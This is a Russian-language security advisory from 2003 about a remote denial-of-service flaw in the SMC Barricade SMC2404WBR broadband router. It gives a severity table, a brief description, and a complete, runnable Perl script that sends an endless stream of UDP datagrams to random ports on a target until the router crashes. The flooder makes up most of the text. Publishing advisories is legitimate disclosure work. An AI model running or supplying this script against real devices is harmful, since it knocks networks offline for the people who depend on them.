Удаленный DoS против Barricade Turbo Broadband Router SMC2404WBR
| Дата публикации: | 02.10.2003 |
| Всего просмотров: | 1444 |
| Опасность: | Средняя |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Отказ в обслуживании |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | Barricade Turbo Broadband Router SMC2404WBR |
| Уязвимые версии: Barricade Turbo Broadband Router SMC2404WBR
Описание: Уязвимость обнаружена в Barricade Turbo Broadband Router SMC2404WBR. Злонамеренный пользователь может вызвать DoS нападение. Удаленный пользователь может послать множественные UDP датаграммы к случайным портам на устройстве, чтобы аварийно завершить работу маршрутизатора. Пример/Эксплоит:
#!/usr/bin/perl
use Socket;
system(clear);
if(!defined($ARGV[0]))
{
&usage
}
my ($target);
$target=$ARGV[0];
my $ia = inet_aton($target) || die ("[-] Unable to resolve
$target");
socket(DoS, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$target");
print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n";
for (;;) {
$size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand;
$port=int(rand 65000) +1;
send(DoS, 0, $size, sockaddr_in($port, $iaddr));
}
sub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");}
Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. Используйте другой продукт, |